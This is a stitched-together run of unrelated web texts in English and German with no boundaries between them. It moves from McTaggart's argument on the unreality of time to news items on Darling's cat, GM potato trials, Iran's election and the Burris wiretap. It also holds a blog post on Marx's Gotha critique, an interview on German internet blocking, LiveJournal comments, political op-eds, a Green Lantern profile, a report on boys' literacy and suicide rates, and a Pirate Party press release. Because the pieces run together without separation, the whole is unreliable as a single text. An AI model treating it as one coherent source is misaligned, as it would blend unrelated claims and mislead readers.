And there will be some truth in this , for the realities , which we perceive as the events M and N , do really occupy the same position in a series , though it is not a temporal series .
Again , if we assert that the events M , N , O , are all at different times , and are in that order , we assert that they occupy different positions in the time - series , and that the position of N is between the positions of M and O .
And it will be true that the realities which we see as these events will be in a series , though not in a temporal series , and that their positions in it will be different , and that the position of the reality which we perceive as the event N will be between the positions of the realities which we perceive as the events M and O .
If this view is adopted , the result will so far resemble those reached by Hegel rather than those of Kant .
For Hegel regarded the order of the time - series as a reflexion , though a distorted reflexion , of something in the real nature of the timeless reality , while Kant does not seem to have contemplated the possibility that anything in the nature of the noumenon should correspond to the time order which appears in the phenomenon .
But the question whether such an objective C series does exist , must remain for future discussions .
And many other questions press upon us which inevitably arise if the reality of time is denied .
If there is such a C series , are positions in it simply ultimate facts , or are they determined by the varying amounts , in the objects which hold those positions , of some quality which is common to all of them ?
And , if so , what is that quality , and is it a greater amount of it which determines things to appear as later , and a lesser amount which determines them to appear as earlier , or is the reverse true ?
On the solution of these questions it may be that our hopes and fears for the universe depend for their confirmation or rejection .
And , again , is the series of appearances in time a series which is infinite or finite in length ?
And how are we to deal with the appearance itself ?
If we reduce time and change to appearance , must it not be to an appearance which changes and which is in time , and is not time , then , shown to be real after all ?
This is doubtless a serious question , but I hope to show hereafter that it can be answered in a satisfactory way .
Notes { 1}
It is equally true , though it does not concern us on the hypothesis which we are now considering , that whatever is once in an A series is always in one .
If one of the determinations past , present , and future can ever be applied to N , then one of them always has been and always will be applicable , though of course not always the same one .
{ 2} I am not asserting , as Lotze did , that a relation between X and Y consists of a quality in X and a quality in Y -- a view which I regard as quite indefensible .
I assert that a relation Z between X and Y involves the existence in X of the quality " having the relation Z to Y " so that a difference of relations always involves a difference in quality , and a change of relations always involves a change of quality .
{ 3 } This account of the nature of the A series is not valid , for it involves a vicious circle , since it uses " has been " and " will be " to explain Past and Future .
But , as I shall endeavour to show later on , this vicious circle is inevitable when we deal with the A series , and forms the ground on which we must reject it .
{ 4} It has been maintained that the present is whatever is simultaneous with the assertion of its presentness , the future whatever is later than the assertion of its futurity , and the past whatever is earlier than the assertion of its pastness .
But this theory involves that time exists independently of the A series , and is incompatible with the results we have already reached .
{ 5} It is very usual to present Time under the metaphor of a spatial movement .
But is it to be a movement from past to future , or from future to past ?
If the A series is taken as one of qualities , it will naturally be taken as a movement from past to future , since the quality of presentness has belonged to the past states and will belong to the future states .
If the A series is taken as one of relations , it is possible to take the movement either way , since either of the two related terms can be taken as the one which moves .
If the events are taken as moving by a fixed point of presentness , the movement is from future to past , since the future events are those which have not yet passed the point , and the past are those which have .
If presentness is taken as a moving point successively related to each of a series of events , the movement is from past to future .
Thus we say that events come out of the future , but we say that we ourselves move towards the future .
For each man identifies himself especially with his present state , as against his future or his past , since the present is the only one of which he has direct experience .
And thus the self , if it is pictured as moving at all , is pictured as moving with the point of presentness along the stream of events from past to future .
J.UCS is run by the J.UCS consortium consisting of the following research institutions ( in alphabetical order ) :
Austrian Competence Center for Knowledge Management , Graz , Austria
Galileo University , Guatemala City , Guatemala
Graz University of Technology , Graz , Austria
Institute for Information Systems , RWTH Aachen University , Aachen , Germany
Capital University of Science and Technology , Islamabad , Pakistan
National University , San Diego , USA
Technische Universität Braunschweig , Germany
ZBW , Leibniz Information Centre for Economics , Kiel , Germany
Unique Features of J.UCS Imprint
Chancellor Alistair Darling 's cat Sybil , the former chief mouser of Downing Street , has died after a short illness .
Mr Darling 's spokeswoman confirmed that the black and white cat died yesterday at the home of a family friend in London .
Sybil , named after Basil 's wife in the TV show Fawlty Towers , was moved into the Chancellor 's flat above 11 Downing Street from the Darling family home in Edinburgh in 2007 .
Download the new Independent Premium app Sharing the full story , not just the headlines
Gordon Brown 's official spokesman told reporters at the time : " The Prime Minister and Sarah do not have a problem with it . "
But the renowned mouser was eventually taken back to Scotland after failing to settle .
Sybil 's predecessor Humphrey wandered around Downing Street for years after first arriving in 1989 .
But he moved out just six months after Tony Blair became PM in 1997 .
June 7 , 2009 — Alderson Warm - Fork
An interesting contrast between political debates of the last few decades and those before is the way that the idea of ‘ receiving what you worked for ’ has shifted sides .
That is , in the 19th century , the claim that the products of people ’s labour were being taken from them unfairly for the benefit of those who had n’t worked as hard was a typically socialist claim – the workers should throw off their ‘ parasitic ’ employers and establish the sort of just society in which people are given only as much as they produce .
The value of work and effort was affirmed , the way that it justified and ennobled the worker .
Since the establishment in many Western countries of a substantial welfare state , though , that same idea has to some extent become a conservative and pro-capitalist talking point : that ‘ the state ’ is ‘ robbing ’ productive people of the wealth that they ’ve earned and then unfairly lavishing it on the feckless and workshy .
It ’s more common now to see people on some sort of ‘ left ’ defending the idea , not of everyone receiving as much as they contribute , but of people receiving even if they have n’t contributed .
Now this presents an interesting spectacle for those who want to both maintain an ongoing connection with the 19th - century socialist tradition , and also deal fully with modern developments .
In particular , it poses the question : what should socialists think about this principle , of receiving only what you put in ?
Now of course something that needs to be stressed is that in practice , many extraneous factors come into play .
For example , conservatives who protest about the rich being deprived of the wealth that ‘ they have earned ’ can be criticised not by attacking or defending the abstract principle of ‘ receiving what you have earned ’ but with the accusation that the ‘ earning ’ they talk about is misdescribed : that wealth was largely created by other people ’s effort and work , not theirs .
Similarly , when considering the issue of unemployment benefits , it ’s obviously not sufficient to think only of the abstract question of justice : there is also the fact that if unemployment benefit exists , then workers will have less fear of unemployment , and thus be able to demand higher wages and better conditions .
That is , the welfare state strengthens the position of the working class .
For class - struggle socialists , that is held to be the most important factor in practice .
However , there ’s no reason to think that this sort of question and the clash of principles involved will vanish with the abolition of capitalism .
Post - revolutionary societies will have to ask similar sorts of questions , though in a quite different context .
So it is of philosophical interest to consider such questions today .
The second big thing to note , then , is that one interesting suggestion has already been made by a Mr. Marx , who in his Critique of the Gotha Program distinguishes between “ communist society … as it has developed on its own foundations ” and “ communist society … as it emerges from capitalist society ” .
In the latter society , which is “ economically , morally , and intellectually , still stamped with the birthmarks of the old society ” , and which Marxists have sometimes called ‘ socialism ’ to distinguish it from more fully developed ‘ communism ’ , there remains the principle of ‘ equal pay for equal work ’ – a right that Marx explicitly calls ‘ bourgeois ’ .
So labour is measured and quantified , and in proportion to that each individual is given a certain amount of ‘ labour vouchers ’ or some such , with which to purchase consumption products .
This co-exists , of course with a greatly extended version of what we would now call ‘ welfare ’ and ‘ public services ’ , but nevertheless it remains – and it generates a low level of ‘ inequality of wealth ’ that replicates ‘ inequality of talents ’ .
In the more fully developed form of communism , however , it ’s suggested that “ the narrow horizon of bourgeois right [ can ] be crossed in its entirety and society inscribe on its banners :
From each according to his ability , to each according to his needs ! ”
Now I think this overall picture is a good one .
One might wonder about the idea of the ‘ transitional stage ’ , and be concerned that the power - relations involved in this kind of ‘ maintenance of bourgeois right ’ might have their own potency , might hold back of affect the ‘ progression ’ to a fuller communism .
This kind of concern mirrors the concern over the idea of the ‘ workers ’ state ’ overseeing socialism before eventually ‘ withering away ’ of its own accord , and so it ’s not surprising that it is often found among anarchists – Kropotkin for example is emphatic on this point .
But be that as it may , the basic judgement on the principle at issue is clear and I think correct .
That judgement is two - fold :
firstly , that it is a capitalist principle , appropriate to a capitalist frame of mind , and flawed and false insofar as capitalism is a flawed and unjust society ; but
secondly , that capitalism violates it , and that a society which upheld it ( by abolishing income from capital , hence abolishing private ownership thereof ) would be in its essential content socialist .
This principle is thus one of the ‘ contradictions ’ of capitalism : though in the abstract , and in the long run , it is reactionary and wrong , and should be set aside , it simultaneously functions as an internal criticism of capitalism .
In my next post I ’ll talk about the principle itself in more detail , laying out precisely why it ’s a false one and how it relates to capitalism .
Leave a Comment and Tell Us If You Think This Is Okay ?
( OrganicJar ) A field of genetically modified ( GM ) potatoes - created to be resistant to pests - was planted in a Yorkshire field earlier this year by Leeds University scientists .
Last year , environmental activists ripped up a field of identical plants on the same farm , causing more than US $ 40,000 damage and wasting months of research work .
The 400 potato plants are resistant to nematode worms , which cost British farmers around $ 107 million a year .
GM scientists say the new strain could lead to a cut in chemical pesticide use .
The crop is growing next to plants that will be destroyed once the experiment is complete ; the field will then be left fallow to reduce the risk of cross-pollination .
To reduce the risk of vandalism , scientists have surrounded the new experimental field with fencing and CCTV cameras to protect against vandals .
GM crops have been grown near a farm in Yorkshire amid a storm of controversy , which also followed a similar trial on a farm near Cambridgeshire last year .
Although details of the trial were published on the Department for Environment , Food and Rural Affairs ( DEFRA ) website , locals were not told that the crop had been replanted .
Defra said its permission for the trial , granted for three years , remained valid and that the potatoes can be replanted without further notice .
It also said the potatoes would not be used for human or animal consumption and that they would be grown in a ' safe environment ' with no risk of contamination .
Supporters of the technology say it will allow plants to be grown in arid andsalty places where ordinary crops fail -- and could prevent a worldwide food shortage in years to come .
However , environmental activists warned that neighbouring farms could be put at risk from the GM experiment .
Clare Oxborrow , of Friends of the Earth , said : " Defra clearly does not want people to known it is going on this year .
This worries us because farmers , gardeners and people living nearby should know about it because of the risk of contaminating other plants .
They are trying to slip it under the radar . "
Defra said published details and map references of all GM experiments on its website and denied that it tried to keep people in the dark .
Vandals and eco-campaigners have destroyed almost all of the 54 attempts to grow experimental GM plants outdoors in the UK in the last five years .
A GM trial in Cambridgeshire was abandoned last year when trees were ripped up .
Last year Prof Howard Atkinson , who is leading the Leeds experiment , called for details of small - scale GM trials to be kept secret from the public , claiming it cost around $ 165,000 to install security fences and guards at a GM field trial .
Source : dailymail.co.uk
Aktivierung der Netzsperren : " Verheerender Ausblick "
In den nächsten Wochen muss das Gesetz zur Netzsperre von den Providern umgesetzt werden .
Michael Rotert von der deutschen Internetwirtschaft warnt vor Überregulierung und Offline - Politikern .
Herr Rotert ,
Sie vertreten viele große Internet - Dienstleister in Deutschland und müssen jetzt die Durchsetzung des neuen Netzsperrengesetzes koordinieren .
Beschäftigen
Sie jetzt viele kleine Zensoren ?
Michael Rotert : Vielleicht hätten die Politiker das so gerne , aber dem ist natürlich nicht so .
In der Tat musste aber das BKA als Listenersteller fast schon überredet werden , die Sperreinträge nicht als Excel - Liste zu schicken .
Denn was wir brauchen ist ein verschlüsseltes Format , das die automatisierte Übernahme ermöglicht .
Da braucht auch keiner mehr in die Listen zu schauen .
ZUR PERSON Michael Rotert ist Vorstandsvorsitzender des Verbandes der deutschen Internetwirtschaft , eco e.V. , in dem die meisten deutschen Netzprovider vertreten sind .
Der Verband war federführend bei der Errichtung des zentralen deutschen Netzknotens DE - CIX in Frankfurt und vertritt die Provider gegenüber der Politik .
Rotert selbst ist Netzveteran : Als Forscher an der Uni Karlsruhe arbeitete er aktiv an der ersten Internet - Anbindung Deutschlands in den Achtzigerjahren mit .
Und wer zensiert ?
Als Zensoren könnte man die Listenersteller bezeichnen , aber hier gilt es abzuwarten , bis die ersten Listen vorliegen .
Dann wird sich sicher schnell zeigen , von welcher Qualität die Einträge sind .
Ich gehe davon aus , dass die deutsche Liste , wie auch in den anderen Ländern in denen geblockt wird , innerhalb kürzester Zeit im Netz zu finden sein dürfte .
Übrigens warnt selbst der Europarat vor Überregulierung und schleichender Zensur .
Im Netzsperren - Gesetz steht , dass so genannte Domain - Blockaden nur die Mindestvoraussetzung sind .
Dabei werden einzelne Adressen auf den Sperrserver umgeleitet , was sich technisch sehr einfach umgehen lässt .
Was können die Nutzer noch erwarten , wenn die Sperrinfrastruktur einmal steht ?
Die Forderungen liegen jetzt schon auf dem Tisch .
In der Warteschlange stehen wegen illegaler Downloads die Rechteinhaber , Glücksspiele , Onlinespiele , rechtsradikale Server etc. Dabei muss man zwei Dinge sehen , erstens : wer erstellt die Einträge und zweitens : über wie viele Einträge reden wir hier .
Die Anzahl der Einträge ist endlich , denn irgendwann geht die Bandbreite in die Knie , weil das Netz nur mit Nachschauen beschäftigt ist , ob der Eintrag umgelenkt werden muss .
Also lässt sich das Netz nicht sperren .
Letztendlich nicht .
Der Ausblick ist allerdings erschreckend , denn wenn semantische Verfahren einmal weiterentwickelt sind , kann auch nach beliebigen Inhalten per Beschreibung gesucht werden .
Allerdings sind die Verfahren noch nicht für den Einsatz direkt im Datenstrom geeignet .
Zusätzlich muss natürlich dann auch die Infrastruktur überwacht werden , damit ja nichts am Staat vorbeigeht .
Und das würde schon in der realen
Welt nicht funktionieren .
Nicht auszudenken , wenn die Post auch alle Briefe kontrollieren müsste .
Denn nur dann ist ja die Forderung der Politiker erfüllt , dass die Onlinewelt der Offlinewelt im juristischen Sinne entspricht .
Auch müsste man aus den Büchereien alle Bücher mit Bombenbauanleitungen entfernen , denn die darf es auf dem Netz auch nicht geben .
Schlüsseldienste müssen ebenso zumachen , denn in der Onlinewelt sind Hackertools , auch wenn sie für Sicherheit sorgen , verboten .
Wie viel müssen Ihre Mitglieder in die Sperrinfrastruktur investieren ?
Ersetzt Ihnen das jemand ?
Der Mitteleinsatz lässt sich so genau nicht bestimmen , denn es hängt natürlich stark von der Netzinfrastruktur und Größe des jeweiligen Providers ab .
Wir gehen beim derzeitigen Umfang von einem dreistelligen Millionenbetrag aus , der gerade in einer Finanzkrise zum Fenster rausgeschmissen wird .
Zusätzlich werden Provider durch alle diejenigen , die Zensur nicht mögen und deshalb auf andere Nameserver ausweichen , was jeder in seinem Rechner einstellen kann , noch dadurch bestraft , dass Dienste von Nichtkunden verstärkt genutzt werden .
Natürlich will der Staat dies alles zum Nulltarif und verweist hier wie bei allen anderen Maßnahmen auch bei den Providern auf die Bürgerpflicht .
Trotz des heiklen Themas Kinderpornografie , das neben dem Terrorismus in der Politik offenbar gerne als Totschlagargument verwendet wird , hat sich die Netzcommunity massiv gegen das Sperrgesetz gewehrt .
Genutzt hat es wenig .
Die Politik scheint das Internet noch nicht ernst zu nehmen .
Denken Sie , dass sich das in den nächsten Jahren ändert ?
Genau dieses
Thema und die Opfer für den Wahlkampf zu missbrauchen und dabei mit den Sperren noch nicht einmal Opferschutz oder Täterverfolgung zu bieten , ist eher eine Verhöhnung der Wähler , als solide und bürgerfreundliche Politik .
Den missbrauchten Kindern ist nicht damit gedient , dass eine Frau von der Leyen sich hinstellt und erzählt , wie wunderbar die Sperren funktionieren .
Mit jungen Abgeordneten wird sich aber sicher auch das Verhältnis zum Internet mit der Zeit ändern .
Nur heute weiß die Politik noch nichts mit dem Internet anzufangen .
Bestes Beispiel ist der aktuelle Wahlkampf : Anstatt kreativ zu sein , stellen viele Politiker ganz platt nur das ins Netz , was sie auch in gedruckten Prospekten veröffentlicht haben .
Die Netzcommunity fürchtet , dass die einmal errichtete Infrastruktur missbraucht werden könnte , etwa zum Sperren anderer missliebiger Inhalte vom Killerspiel über die Raubkopie bis hin zu politischen Inhalten .
Teilen Sie die Befürchtungen ?
Dies ist zumindest jetzt schon die Forderung einiger Politiker , die noch ein Wahlkampfthema suchen , obwohl das Gesetz sich ausschließlich gegen Kinderpornografie richtet .
Aber die Vergangenheit hat ja schon bei den Daten der Autobahnmaut gezeigt , dass die Politik auf dem Standpunkt steht , " was interessiert mich mein Geschwätz von gestern " .
Dies gilt insbesondere für die Zeit nach der Wahl .
Page 1 of 3 << [ 1 ] [ 2 ] [ 3 ] >>
From : lindykins
2009-07-17 08:18 pm ( UTC )
Personally I 'd take the gun frog .
From : fatkraken
2009-07-17 08:25 pm ( UTC )
aye , I was gonna say , this is a joke than can ONLY work on the internet .
Without scrolling , it 's just a bit silly .
With it , it 's AMAZING
From : uniformgrey
2009-07 -17 08:30 pm ( UTC )
It is MAGNIFICENT !
From : user_undefined
2009-07-17 08:31 pm ( UTC )
YOU JUST EPIC'D MY BRAIN TO DEATH
THANKS A LOT
From : rdbelcher
2009-07-17 08:31 pm ( UTC )
That thing is an abomination , and I want one .
From : chinesestudio
2009-07-17 08:38 pm ( UTC )
... Take it out back and shoot it .
From : kingkibble
2009-07-17 08:48 pm ( UTC )
You know I hear a couple drops of lavender on your pillow every night makes the nightmares go away .
From : raptorix
2009-07-17 09:36 pm ( UTC )
How do you obtain lavender in a liquid form ?
Because I grow it in my yard and it's a smelly plant ( often swarmed with bees . )
From : bakajin
2009-07 -17 09:06 pm ( UTC )
select your gun
then select your horse
From : ( Anonymous )
2009 -07 -18 03:45 am ( UTC )
Dang .
Precisely the thought what popped into my head .
From : raptorix
2009 -07 -17 09:35 pm ( UTC )
You know , the Kirin is technically both too ...
But thank you for creating something that made me shout aloud " WHAT THE HELL ?! " and laugh very very hard .
:D
( Deleted comment )
From : nedroidcomics
2009-07-17 09:39 pm ( UTC )
I bet that smells magical
( Deleted comment )
From : dwimmer
2009-07-18 12:21 am ( UTC )
it is like a beautiful afterschool special !
From : ( Anonymous )
2009-07 -17 10:27 pm ( UTC )
There 's no such thing as a dragonicorn .
From : awkwardmouse
2009-07-18 04:40 pm ( UTC )
but there is , as Shihtzu said , a Unigon !
It 's been way too long since we 've seen a politician so brazenly masquerade failure as success .
About six years , to be exact .
When President Bush stood upon the deck of the USS Abraham Lincoln on May 1 , 2003 in an expertly crafted photo - op and declared that the mission was accomplished in Iraq , he engaged in a gravity - defying feat .
He turned the world on its head , inverting all sense of logic as he boasted that " major combat operations in Iraq have ended . "
When Bush declared that victory , some 176 Americans has already lost their lives in Operation Iraqi Freedom .
Another 4,145 have perished since then , validating now what was awkwardly apparent to all of those listening to the president then -- the premature jubilation about victory was nothing more than a refusal to acknowledge the current failure of the mission at hand .
Flash forward six years and there is Governor Sarah Palin , in a hastily called press conference , bizarrely and inexplicably quitting her post midway through her term .
Palin 's resignation speech strikes the same themes as Bush 's Mission Accomplished speech .
Like Bush , Palin presented a litany of " accomplishments " that purportedly validated the disengagement of the moment .
She similarly promised that the announcement meant entering a new phase in a larger battle ( hers , ideological , and no doubt consisting of a parade of paid appearances and candidate fundraising ) .
I cannot count how many times Palin declared during her speech that that she was " unconventional , " that her decision was untraditional , and that she was , well , any other " mavericky " synonym you can imagine .
But in emphasizing -- repeatedly -- that she was not " built for ' politics as usual ' " , one could not help but feel as if the lady doth protest too much .
Perhaps she learned from Bush that " you gotta catapult the propaganda . "
Whatever the reason , the fierce recasting of her failure as victory reeks of Bush - like hubris .
For in abandoning her duties halfway through her elected term , in reacting to the needs of Alaskans with a " meh " and a shrug , in her palpable contempt for the press and in her stumbling tango around the truth , Palin proved that she is , indeed , a typical political creature ... and very unoriginal .
Mission accomplished , soon to be former Governor Palin !
You have proven yourself an able contortionist , twisting circumstances to your convenience and naively believing that your self - serving yelps of success will drown out the shocking volume of your ineptitude .
It 's political spin that would make George W. Bush proud .
Via Matt Yglesias , Barron YoungSmith has a post over at TNR arguing that Craiglist is n't a ruthless corporate killer of newspapers because unlike , say , Wal - Mart , Craigslist is n't driven by profit maximization :
While Wal - Mart is bent on maximizing returns for its shareholders -- an appropriate goal , for a corporation -- Craigslist is not . [...]
Craigslist does n't even try to profit from its economic activities , because its owners are devoted to a form of libertarian ideology .
But Craiglist does n't have any shareholders !
It 's a privately held company .
Wal - Mart is driven by profit maximization because its managers have a fiduciary duty to maximize shareholder value .
If they do n't , then ( in theory ) they 'll be fired .
And if they are n't fired , then ( in theory ) the company will be ripe for a gruesome Carl Icahn - style takeover .
Craig Newmark , on the other hand , can do whatever the heck he wants .
And because Craigslist is privately held , I do n't know how you 'd falsify the claim that what he does is n't motivated by a desire for profit .
( But maybe a lawyer will know this :
At the very least , does n't Craigslist need to show an intent to make a profit , if it wants to claim various business tax credits ? )
A related point is what this means for newspapers .
Both Matt and Barron say it does n't make sense for profit - maximixing newspapers to compete with an ideologue like Newmark .
But what I find odd about this sentiment is that newspapers have never really been profit - maximizing instituttions .
There 's the New York Times and its two classes of stock ; there 's the Washington Post , basically run on the dole with money from Kaplan test prep ; there 's the Associated Press , with its weird not - for - profit cooperative ownership structure ( sounds socialist ! ) .
And while I 'm all for adding to the list of crazy hybrid ownership structures , I 'm not so eager to cheer the destruction the preexisting ones .
Photo from Flickr user monochrome
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Test pilot Hal Jordan went from being a novelty , the first - ever human Green Lantern , to one of the most legendary Lanterns to ever wield a power ring .
Hal Jordan ’s life was changed twice by crashing aircraft .
The first time was when he witnessed the death of his father , pilot Martin Jordan .
The second was when , as an adult and trained pilot himself , he was summoned to the crashed wreckage of a spaceship belonging to an alien named Abin Sur .
Abin explained that he was a member of the Green Lantern Corps , an organization of beings from across the cosmos , armed with power rings fueled by the green energy of all willpower in the universe .
Upon his death , Abin entrusted his ring and duties as the Green Lantern of Earth ’s space sector to Hal Jordan .
Hal ’s life as a Green Lantern has not been easy .
He ’s had to fight not only enemies , but often friends , colleagues and loved ones .
But despite the strain his Green Lantern identity has put on his life , Hal is an honest man who can operate without fear , and is always willing to protect those in need — whether alone , with the Corps or alongside the Justice League and Earth ’s other Super Heroes .
For Hal has sworn the oath of every Green Lantern — that no evil will escape his sight .
For more on Green Lantern 's history , visit his page on DCUniverse.com .
Growing up is tough .
But for boys , it may be even tougher .
While both boys and girls face issues — in school and out — the problems affecting boys are serious and have not been properly addressed by policy makers , according to a new review article by psychologist Judith Kleinfeld .
Among the results : high rates of functional illiteracy and a troublingly high suicide rate that 's become even more pronounced in recent years compared to the rate among girls .
" Boys ' issues are being neglected , whereas girls ' issues have been addressed for over 20 years , with great success , " said Kleinfeld , a professor at the University of Alaska in Fairbanks .
" Now it 's time to turn our attention to boys . "
Following concerns about psychological and educational problems affecting girls in the early 1990s , discussion of a so - called " boy crisis " emerged .
Some publications claimed that boys were falling behind girls in school success and that feminist ideology was partly to blame for lack of attention on the issue .
In her paper , Kleinfeld examines gender differences through a number of academic and social measures .
She looked at educational achievement , school grades , engagement in schools , dropout rates , college entrances tests , suicide rates , depression problems , and conduct disorders for both girls and boys .
She concludes that , while neither gender is in a crisis , boys ' issues are troubling and overlooked .
Johnny struggles to read Kleinfeld finds that , compared with girls , American boys have lower literacy rates , lower grades , less engagement during school and higher drop - out rates .
Boys also have higher rates of suicide , arrests and premature death .
On the other hand , girls are more likely to have other problems , such as suicidal thoughts and eating disorders .
" I , like Dr. Kleinfeld , do n’t want to say that one [ gender ] has more problems than the other , " said William S. Pollack , the director of the Centers for Men and Young Men at McLean Hospital / Harvard Medical School .
" But it tends to be boys whose deeper problems are not looked into , and for whom programs that exist are not funded ... that ’s absolutely true . "
While Pollack has worked with Klenfield in the past , he was not involved in the current review article .
One of the most urgent issues , says Kleinfeld , is boys ' writing .
She looked at scores from the National Tests of Educational Progress , and found that boys ' scores are far below those of girls .
For 12th grade students , about 26 percent of boys had scores at the " below basic " writing level , while only 11 percent of girls were in this category .
The situation is similar for younger boys .
In 8th grade , 17 percent of males scored below basic while just 7 percent of females scored at this level .
Boys ' suicide crisis ?
Another serious problem is suicide rates , Kleinfeld points out .
In her review , she cites data from the National Center for Health Statistics to show the " alarming " suicide rate among boys .
From 1995 to 2005 , the rate of suicide among 20 to 24 year - old boys was 20.7 suicides per 100,000 , while the rate for girls was just 3.5 per 100,000 .
Among 15 to 19 year olds , the rates were 12.5 per 100,000 for boys and 2.8 per 100,000 for girls .
And the difference between the gender suicide rates is rising .
" In 1933 the young male suicide rate was 1.54 times higher than for young females .
In 2005 the male rate was 4.63 times higher than the female rate , " Kleinfeld said .
In general , suicide is a problem that is downplayed in our society , experts say .
In fact , suicides are more common than homicides .
Overall , the U.S. murder rate is about 6 per 100,000 ; for suicides it 's 10.8 .
It 's higher among adult men than women .
" There ’s no doubt that in relation to suicide , boys and young men are in a crisis , " said Pollack .
" And almost nothing has been done to remediate it from the gender perspective . "
Unlike Kleinfeld , Pollack does not feel that the word " crisis " should be avoided when discussing boys ' issues .
" The term crisis tends to sometimes bring more heat than light to the conversation because it seems as though someone is saying that boys have critical problems and girls do n’t , which is ridiculous , " Pollack said .
" But the crisis about boys is , their problems remain more hidden , misunderstood , or attention is not paid to them in a positive manner . "
Solutions needed
Kleinfeld notes that while there have been many federal , state and school district programs targeted towards addressing girls ' issues , there have not been many such programs for boys .
Kleinfeld has a few ideas about solutions to the problem .
" One [ solution ] is to create a national commission on boys , just the way national commissions on girls have been established , " she said .
Also , teachers should be alerted " to the particular problems boys have in writing , and also reading , " she contends .
Finally , we can " use the mental health professionals and especially school counselors who are on the front lines to identify boys who are at danger of suicide . "
Kleinfeld 's review is published in the June issue of the journal Gender Issues .
The oh so highly anticipated mixtape from the man himself , Wale , just dropped , the mixtape is entitled " Back to the Feature . "
I have n't even had a chance to listen to it yet , so share your thoughts ..
I 'm sure its nothing short of amazing though .
The mixtape was brought to you by LRG and features endless names like ..
Joe Budden , Skyzoo , Talib Kweli , Joell Ortiz , Young Chris , Black Thought , Big Sean , Torae , Memphis Bleek , J. Cole , Curren$y , Jean Grae , Royce Da 5′9 ″ , Bun B and many more .
Enjoy .
Download : " Back to the Feature " the mixtape HERE
Download Mirrors HERE
featuring Joe Budden , Skyzoo , Talib Kweli , Joell Ortiz , Young Chris , Black Thought , Big Sean , Torae , Memphis Bleek , J. Cole , Curren$y , Jean Grae , Royce Da 5′9 ″ , Bun B and many more .
Unter dem Motto „ Wir sind Gamer “ demonstrierten gestern in Berlin , Karlsruhe und Köln ComputerspielerInnen gegen den Beschluss der Innenministerkonferenz , so genannte Killerspiele mit einem Herstellungs - und Verbreitungsverbot zu belegen .
Zu den Kundgebungen hatte auch die Piratenpartei aufgerufen , die im Anschluss an die Berliner Demonstration in einer öffentlichen Aktion „ Killerschach “ mit 32 kostümierten menschlichen Spielern und 20 Litern
Kunstblut spielte .
Florian Bischof , Spitzenkandidat des Landesverbands Berlin der Piratenpartei für die Bundestagswahl , erläutert den Hintergrund der Aktion :
„ Die absurde Diskussion um die so genannten Killerspiele wird mit erschreckender Regelmäßigkeit wieder aufgeworfen .
Mit der Aktion „ Killerschach “ wollen wir auf die mangelnde Differenziertheit in der öffentlichen Debatte um Computerspiele aufmerksam machen .
Die Spielkultur von Menschen enthielt schon immer Elemente von Gewalt , die Spieler können Fiktion und Wirklichkeit aber sehr gut auseinander halten .
Wissenschaftlich konnte bisher nicht nachgewiesen werden , dass Computerspiele Gewalttätigkeit fördern – die vorhandenen Studien sind höchst widersprüchlich .
Auch Schach ist ein zutiefst kriegerisches Spiel .
Gleichzeitig hat es aber einen hohen intellektuellen , strategischen Anspruch .
Das gilt auch für die meisten Computerspiele .
Jedem neuen Kulturmedium haben Generationen , die nicht damit aufwuchsen , erstmal misstraut .
Selbst dem Roman wurde damals vorgeworfen , der Leser könne Wirklichkeit und Fiktion nicht trennen .
Dem Fernsehen , Comics und der Rockmusik wurden ähnliche Vorwürfe gemacht .
Der Beschluss der Innenministerkonferenz ist eine Bankrotterklärung der etablierten Politiker , die kein Verständnis für die Lebenswelt von Jugendlichen haben .
Computerspiele halten als Sündenbock für hochkomplexe politische und gesellschaftliche Probleme her .
Es macht mich wütend , dass dieser schlechte Scherz , diese Augenwischerei einiger offensichtlich in einer Parallelwelt lebender Politiker noch immer nicht vom Tisch ist .
Amokläufe zu verhindern und Gewalt an Schulen zu begegnen ist ein viel zu dringliches Ziel , um das Thema der populistischen Vereinfachung von Politikern im Wahlkampf zu überlassen .
Außerdem steht ein Verbot im Konflikt mit dem Grundgesetz , mit Kunst- , Berufs - und Informationsfreiheit . “
Statt pauschal große Teile der Jugendkultur zu kriminalisieren , fordert die Piratenpartei daher , bereits in den Schulen mehr Medienkompetenz zu vermitteln .
Schulpsychologen sowie außerschulische Anlaufstellen für Jugendliche , wie Beratungseinrichtungen und Jugendzentren , müssen ausreichend Gelder zur Verfügung stehen , um sich verzweifelten Kindern und Jugendlichen anzunehmen .
Zudem darf der öffentliche Dialog über Computerspiele nicht länger über die Köpfe der betroffenen Generation hinweg geführt werden .
Fotos der Aktion erhalten Sie unter http://tinyurl.com/l2j93f
( Olaf Hansel ) , http://tinyurl.com/lmpbrr ( Stefan Berkner ) , http://tinyurl.com/lon64n ( Stefan Berkner ) und http://tinyurl.com/lc8slb
( Bernd Brinck ) .
Die Aufnahmen stehen unter einer creative commons cc-by Lizenz und sind bei Namensnennung beliebig verfügbar .
President Mahmoud Ahmadinejad on Tuesday made his first televised address since Iran ’s disputed elections , calling them “ the freest ” and “ healthiest ” in the world , while opposition leaders seeking to revitalize their movement demanded an end to the government crackdown and the release of hundreds of arrested protesters .
Faced with rising clerical and political opposition , Mr. Ahmadinejad tried to rally support for a second term whose legitimacy has been questioned before it has even begun , adopting conciliatory language even as his allies in the security services worked to extinguish the burning embers of opposition by force .
Despite the crushing of its street protests , the opposition vowed to continue its movement against what it calls a fraudulent election , planning major rallies in three cities on Thursday , which the government already appeared to be trying to derail .
The defeated presidential candidates Mir Hossein Moussavi and Mehdi Karroubi and former President Mohammad Khatami issued a joint statement late Monday demanding an end to the crackdown , in which hundreds of political figures , intellectuals , journalists and demonstrators have been detained since the June 12 election .
German scientists have invented a new kind of anti-piracy hologram that uses explosives to imprint holograms directly onto metal surfaces .
The nano - technology process uses a thin film of explosive material placed on the surface and detonated .
The explosion imprints every detail of the original film onto the metal surface , where it lasts permanently .
Blowing up pirates
The shock wave also causes the embossed material to become harder , while the complex holograms cannot be easily copied by pirate manufacturers - even if identical templates are used .
As well as directly embossing high value metallic goods like electronics and car parts , the explosive hologram process can be used to create moulds for plastic products with clearly visible holograms .
It is estimated that forged products currently account for approximately 10 per cent of total world trade volume .
The new process , if widely adopted , could soon become cheap enough to emboss everything from Blu-ray discs to prescription medicine packaging .
Enlarge Burris by Scott Olson , Blagojevich by Charley Gallay , both Getty Images A federal judge has apporved the release of a federal wiretap of U.S. Sen .
Roland Burris , D - Ill. , left , having a conversation with the brother of former Illinois Gov. Rod Blagojevich , right .
Burris has been under scrutiny since changing his story several times about whether he promised anything to Blagojevich in exchange for the Senate appointment .
